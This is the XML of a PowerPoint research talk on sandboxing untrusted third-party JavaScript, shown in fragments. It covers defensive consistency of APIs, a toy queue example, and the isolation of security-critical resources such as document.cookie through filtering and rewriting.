            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="376092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Consistency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267200" y="1447800"/>
            <a:ext cx="4495799" cy="190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Defensive Consistency</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: verify that the API always provides correct service to good components </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>irrespective of any malicious components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laptop"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="76200" y="1143000"/>
            <a:ext cx="4038600" cy="304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44296" y="1295400"/>
            <a:ext cx="2575706" cy="1291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294" y="2562530"/>
            <a:ext cx="2575706" cy="405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Protected resources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0202" y="1600200"/>
            <a:ext cx="694798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1600200"/>
            <a:ext cx="661960" cy="500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Bob</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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0202" y="2134771"/>
            <a:ext cx="1966358" cy="3798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API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0" y="1200089"/>
            <a:ext cx="5257800" cy="17678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Consistency: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2954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q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= []; // even number queue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="376092"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p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api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= {};</a:t>
            </a:r>
          </a:p>
          <a:p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api.push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function(x){q.push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()};</a:t>
            </a:r>
          </a:p>
          <a:p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api.pop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function(){return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76092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>q.pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>()}; 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76200" y="4876800"/>
            <a:ext cx="8991600" cy="1355190"/>
            <a:chOff x="76200" y="4817010"/>
            <a:chExt cx="8991600" cy="1355190"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rounded Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="4817010"/>
              <a:ext cx="8991600" cy="13551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4959490"/>
              <a:ext cx="838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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>  Bob:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>api.push(10);</a:t>
              </a:r>
            </a:p>
            <a:p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Alice: api.push({a:1000});</a:t>
              </a:r>
            </a:p>
            <a:p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  Bob: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200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api.pop</a:t>
              </a:r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</a:rPr>
                <a:t>(); // returns {a:1000} </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                  <a:sym typeface="Wingdings"/>
                </a:rPr>
                <a:t>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396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Is this API defensively consistent with respect to the specification ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty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42935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NO!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76200" y="1143000"/>
            <a:ext cx="4038600" cy="304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4296" y="1295400"/>
            <a:ext cx="2575706" cy="1291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3294" y="2562530"/>
            <a:ext cx="2575706" cy="405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Protected resources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0202" y="1600200"/>
            <a:ext cx="694798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1600200"/>
            <a:ext cx="661960" cy="500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Bob</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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0202" y="2134771"/>
            <a:ext cx="1966358" cy="3798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API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30480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Specification:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> As long as you push even numbers, you pop even numbers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50" y="3048000"/>
            <a:ext cx="8918050" cy="2514600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="283464" indent="-283464"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Define </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>safe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>(B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>as ES3 with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Identifer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and Dot filters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>applied</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="283464" indent="-283464"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Define </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>rew</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>safe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>(B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>)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" charset="0"/>
              </a:rPr>
              <a:t>→</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>safe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>(B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>using 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IDX rewriting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="283464" indent="-283464"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Let </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>be the heap obtained by executing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>IDX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:cs typeface="Calibri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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>initialization </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="283464" indent="-283464"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Hurdle:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> some global variables get accessed implicitly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="649224" lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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var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= { } // implicitly accesses Object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="649224" lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>From the semantics, we obtain the set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1" smtClean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implicit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of all such names </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="283464" indent="-283464"/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501650"/>
          </a:xfrm>
        </p:spPr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60403989-3EFF-4C4D-9A9D-F370A7D41FF0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4374233"/>
            <a:ext cx="8839200" cy="1035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Claim:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> For all terms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t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ∈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safe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(B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,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rew(t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when executed on heap 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H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does not access any identifier or property name from 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B</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" i="1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343400"/>
            <a:ext cx="88392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Theorem:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> For all terms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t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ∈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safe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(B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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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rew(t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when executed on heap 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H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Calibri"/>
              </a:rPr>
              <a:t>does not access any identifier or property name from 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B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 \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implicit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" i="1" baseline="-250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algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill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533400" y="1409700"/>
            <a:ext cx="8001000" cy="1485900"/>
            <a:chOff x="304800" y="2781300"/>
            <a:chExt cx="8001000" cy="1485900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="Group 32"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4419605" y="2781300"/>
              <a:ext cx="1498595" cy="1409700"/>
              <a:chOff x="4419600" y="5181600"/>
              <a:chExt cx="1284509" cy="1104900"/>
            </a:xfrm>
            <a:effectLst/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="33" name="Manual Operation 32"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="4438650" y="5162550"/>
                <a:ext cx="1104900" cy="1143000"/>
              </a:xfrm>
              <a:prstGeom prst="flowChartManualOperati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84910" y="5401272"/>
                <a:ext cx="1219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Filter &amp; Rewriter</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2400" dirty="0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 rot="10800000">
              <a:off x="5871497" y="3294887"/>
              <a:ext cx="910303" cy="36271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0400" y="3241357"/>
              <a:ext cx="1295400" cy="49244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s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30" name="Right Arrow 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="3276600" y="3276600"/>
              <a:ext cx="910303" cy="36271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800" y="2781300"/>
              <a:ext cx="2895599" cy="14859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i="1" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>rew(s</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p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Calibri"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>does not access any identifiers or properties from </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>B</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Time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3745468"/>
              <a:ext cx="129540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Third-party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5512713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Proof:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> by induction on reduction rules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0" grpId="1" animBg="1"/>
      <p:bldP spid="9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Hosting-Page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Sandboxing Untrusted JavaScript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3989-3EFF-4C4D-9A9D-F370A7D41F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" name="laptop"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="76200" y="1447800"/>
            <a:ext cx="44196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05256" y="1572768"/>
            <a:ext cx="2784373" cy="198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87188" y="2649771"/>
            <a:ext cx="1889412" cy="626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Security-critical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resources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5400000">
            <a:off x="7035585" y="1298448"/>
            <a:ext cx="330633" cy="12953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EAEAEA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a: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rot="5400000">
            <a:off x="4356040" y="2222440"/>
            <a:ext cx="316468" cy="1487052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7598569" y="2971800"/>
            <a:ext cx="1697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Third-party content server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4212431" y="1066800"/>
            <a:ext cx="3026569" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -3514"/>
              <a:gd name="adj2" fmla="val 8614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Language-based sandboxing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25252" y="3212068"/>
            <a:ext cx="14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Hosting page</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Down Arrow 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4108173" y="921025"/>
            <a:ext cx="394254" cy="2057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87188" y="1676400"/>
            <a:ext cx="1889412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Sandboxed code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0" name="Group 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2133600" y="2176538"/>
            <a:ext cx="399292" cy="416976"/>
            <a:chOff x="2432209" y="2170327"/>
            <a:chExt cx="434793" cy="496673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H="1">
              <a:off x="2380564" y="2418663"/>
              <a:ext cx="496673" cy="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31"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="2700000">
              <a:off x="2460550" y="2162198"/>
              <a:ext cx="378112" cy="434793"/>
              <a:chOff x="-1153403" y="-450653"/>
              <a:chExt cx="1142997" cy="1020737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4640000">
                <a:off x="-1130373" y="-383125"/>
                <a:ext cx="1020737" cy="885682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2600000" flipV="1">
                <a:off x="-1153403" y="-344769"/>
                <a:ext cx="1142997" cy="875927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ounded Rectangle 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="5105400"/>
            <a:ext cx="88392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Sandbox Design Problem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: ensure that sandboxed code does not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>access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 given set of security-critical resources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914400" y="4038600"/>
            <a:ext cx="2895600" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -7500"/>
              <a:gd name="adj2" fmla="val -1475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e.g.,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document.cookie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document.location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,…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 4" descr="C:\Documents and Settings\John Mitchell\Local Settings\Temporary Internet Files\Content.IE5\ZR24IX3M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212" y="1524000"/>
            <a:ext cx="1863188" cy="20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410200" y="3505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Hosting page server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 9" descr="C:\Documents and Settings\John Mitchell\Local Settings\Temporary Internet Files\Content.IE5\DCKGN2VX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447800"/>
            <a:ext cx="1079337" cy="21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6" grpId="0" animBg="1"/>
      <p:bldP spid="5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effectLst/>
      </a:spPr>
      <a:bodyPr rtlCol="0" anchor="ctr"/>
      <a:lstStyle>
        <a:defPPr>
          <a:defRPr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66638</TotalTime>
  <Words>10083</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>1400</Paragraphs>
  <Slides>84</Slides>
  <Notes>37</Notes>
  <HiddenSlides>3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Acrobat Document</vt:lpstr>
      <vt:lpstr>Slide 1</vt:lpstr>
      <vt:lpstr>Web 2.0: Webpages with third-party content</vt:lpstr>
      <vt:lpstr>Third-party JavaScript: Security Threat</vt:lpstr>
      <vt:lpstr>Third-party JavaScript: Security Threat</vt:lpstr>
      <vt:lpstr>JavaScript Sandboxing Problem</vt:lpstr>
      <vt:lpstr>Browser-Based Sandboxing: IFRAMES</vt:lpstr>
      <vt:lpstr>Our Approach: Language-Based Sandboxing</vt:lpstr>
      <vt:lpstr>Slide 8</vt:lpstr>
      <vt:lpstr>Hosting-Page Isolation</vt:lpstr>
      <vt:lpstr>Inter-Component Isolation</vt:lpstr>
      <vt:lpstr>Mediate Access: Setup</vt:lpstr>
      <vt:lpstr>Mediate Access: Setup</vt:lpstr>
      <vt:lpstr>Inter-Component Isolation</vt:lpstr>
      <vt:lpstr>Mediated Access: Problems</vt:lpstr>
      <vt:lpstr>Problem: Summary</vt:lpstr>
      <vt:lpstr>Results</vt:lpstr>
      <vt:lpstr>Slide 17</vt:lpstr>
      <vt:lpstr>Hosting Page Isolation</vt:lpstr>
      <vt:lpstr>Hosting Page Isolation: Plan</vt:lpstr>
      <vt:lpstr>Key Features of JavaScript (ES3)</vt:lpstr>
      <vt:lpstr>Operational Semantics for JavaScript (ES3)</vt:lpstr>
      <vt:lpstr>Hosting Page Isolation: Plan</vt:lpstr>
      <vt:lpstr>Sandbox Design Problem</vt:lpstr>
      <vt:lpstr>What global variables does a given JS program access ?</vt:lpstr>
      <vt:lpstr>Sandbox Design Problem: Restatement </vt:lpstr>
      <vt:lpstr>Enforcing the Blacklist</vt:lpstr>
      <vt:lpstr>Attack on FBJS09 IDX Rewriting</vt:lpstr>
      <vt:lpstr>Our IDX Rewriting</vt:lpstr>
      <vt:lpstr>Evaluation</vt:lpstr>
      <vt:lpstr>Hosting Page Isolation: Plan</vt:lpstr>
      <vt:lpstr>Facebook FBJS</vt:lpstr>
      <vt:lpstr>Comparison with FBJS</vt:lpstr>
      <vt:lpstr>Slide 33</vt:lpstr>
      <vt:lpstr>Mediated Access: Problems</vt:lpstr>
      <vt:lpstr>Mediated Access: Plan</vt:lpstr>
      <vt:lpstr>Enforcing mediated access is challenging for ES3</vt:lpstr>
      <vt:lpstr>The ES5-strict language</vt:lpstr>
      <vt:lpstr>Our sub-language Secure ECMAScript (SES)</vt:lpstr>
      <vt:lpstr>Scope-bounded eval</vt:lpstr>
      <vt:lpstr>Operational Semantics for SES</vt:lpstr>
      <vt:lpstr>Mediated Access: Plan</vt:lpstr>
      <vt:lpstr>Sandboxing for SES</vt:lpstr>
      <vt:lpstr>Mediated Access: Plan</vt:lpstr>
      <vt:lpstr>API Design: Write-only Log Example</vt:lpstr>
      <vt:lpstr>API Design: Adding a store method</vt:lpstr>
      <vt:lpstr>Verifying Confinement: Approach</vt:lpstr>
      <vt:lpstr>Key Properties of API Implementations</vt:lpstr>
      <vt:lpstr>Setting up the API Confinement Problem</vt:lpstr>
      <vt:lpstr>Challenges &amp; Techniques</vt:lpstr>
      <vt:lpstr> Verifying Confine(t, critical)</vt:lpstr>
      <vt:lpstr>Express Analysis in Datalog (Whaley et. al.)</vt:lpstr>
      <vt:lpstr>Complete set of Predicates</vt:lpstr>
      <vt:lpstr>Our Decision Procedure (Oakland’11)</vt:lpstr>
      <vt:lpstr>Mediated Access: Plan</vt:lpstr>
      <vt:lpstr>Application: Yahoo! ADSafe</vt:lpstr>
      <vt:lpstr>Slide 56</vt:lpstr>
      <vt:lpstr>Concluding Remarks</vt:lpstr>
      <vt:lpstr>Concluding Remarks</vt:lpstr>
      <vt:lpstr>Related Work</vt:lpstr>
      <vt:lpstr>What next on this topic?</vt:lpstr>
      <vt:lpstr>Two Future Projects</vt:lpstr>
      <vt:lpstr>Collaborators</vt:lpstr>
      <vt:lpstr>Slide 63</vt:lpstr>
      <vt:lpstr>Inter-Component Isolation</vt:lpstr>
      <vt:lpstr>Enforcing Inter-Component Isolation</vt:lpstr>
      <vt:lpstr>Capability Safe Languages</vt:lpstr>
      <vt:lpstr>Contribution</vt:lpstr>
      <vt:lpstr>Other Research Projects</vt:lpstr>
      <vt:lpstr>Other Research Projects</vt:lpstr>
      <vt:lpstr>Hybrid System: Safety and Reachability</vt:lpstr>
      <vt:lpstr>Problem + Approach</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>Other Research Projects</vt:lpstr>
      <vt:lpstr>Need for Symbolic Instruction Encodings</vt:lpstr>
      <vt:lpstr>Problem</vt:lpstr>
      <vt:lpstr>Approach + Result</vt:lpstr>
      <vt:lpstr>Collaborators</vt:lpstr>
      <vt:lpstr>Slide 78</vt:lpstr>
      <vt:lpstr>Slide 79</vt:lpstr>
      <vt:lpstr>API Correctness</vt:lpstr>
      <vt:lpstr>API Correctness: Example</vt:lpstr>
      <vt:lpstr>Defensive Consistency</vt:lpstr>
      <vt:lpstr>Defensive Consistency: Example</vt:lpstr>
      <vt:lpstr>Evaluation</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Stanford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Ankur Taly</dc:creator>
  <cp:lastModifiedBy>Ankur Taly</cp:lastModifiedBy>
  <cp:revision>4777</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-08-11T17:44:58Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-08-12T20:27:51Z</dcterms:modified>
</cp:coreProperties>
</file>